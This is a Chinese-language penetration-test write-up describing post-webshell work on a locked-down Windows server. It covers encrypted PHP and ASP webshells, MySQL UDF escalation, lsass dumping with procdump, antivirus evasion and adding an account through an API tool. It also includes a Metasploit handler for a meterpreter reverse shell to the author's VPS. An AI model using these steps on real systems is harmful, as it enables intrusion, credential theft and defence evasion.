繞過不能執行大部分系統命令和微軟殺毒

公司項目，全程打碼，已經拿下webshell，提權。

看不到任何系統里面的文件，執行系統

懷疑是webshell的問題，隨便傳了一個txt可以訪問，直接傳一個大馬。  

其實傳上去的很多大馬或者小馬都是這個界面，可以訪問但是根本是連接不上的。

最后找了很早之前的神盾加密的Php馬，才能正常訪問。而且有的馬還會被殺。

不知道為啥看不了conf里面的db.php文件。然后翻了下有個Mysql目錄可以udf提權。 

找到Mysql里面的user.myd文件，拼接hash值(40位)，可以正常解密。雖然花費了1塊錢。  

然后利用網上的udf.php很多都不行。只能放棄，考慮別的方法。  

無意中發現，php禁止的其實都屬于php函數，但是asp和aspx跟php是不同的。

傳asp、 aspx大馬訪問都是500，傳了一個asp的冰蝎。。算是可以了。

可以正常執行命令，感覺還算是有點戲。接著執行其他命令。。。我傻了。。。

我真的還是很佩服管理員的，這也是很秀了，進程、端口、所屬權限、wmic、powershell都不能執行。。  

直接nmap掃下吧。  

之前在服務器也看到了tomcat目錄  

其實之前看到這個目錄了，但是看端口被注釋了，眼花看錯了。。。

也是執行不了，但是tomcat做降權應該還是比較少的。生成一個cs馬上去直接被殺。

然后穿了一個procdump64.exe直接導出一個lsass.dmp文件，但是本地mimikatz導入

出了一點問題。既然能執行exe程序，就還能玩。

傳個net.exe net1.exe等試試。  

可惜并不行，導出注冊表啥的肯定也不行，因為reg是不能執行的。有殺軟很多還不傳。只能bypass這個殺軟，雖然不知道是啥。 

生成一個hex文件，然后把gsl64.exe傳上去。  

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost `vps ip`set lport 6666
exploit ‐j

正常上線。首先肯定是先看看進程和端口信息

結合前面的進程發現mstsc的遠程端口改為了9833，也就是3389的反轉。  因為2012系統之后需要修改注冊表，這臺正好。。。沒有修改。只能抓取Hash破解。

用戶還是有幾個，正好都去破解下，很不幸。。都解不開。

破解hash網站
https://www.objectif‐securite.ch/ophcrack
https://www.cmd5.com/

所以只能添加個系統賬號登錄進去，但是net和net1都不能用，知道有一個不依賴net和net1來添加用戶而是用api加用戶，所有我去電腦翻了下，找到一個。  

傳上去試試。

在meterpreter執行下hashdump看看有沒有添加成功。

還是有點麻煩的。。。再見。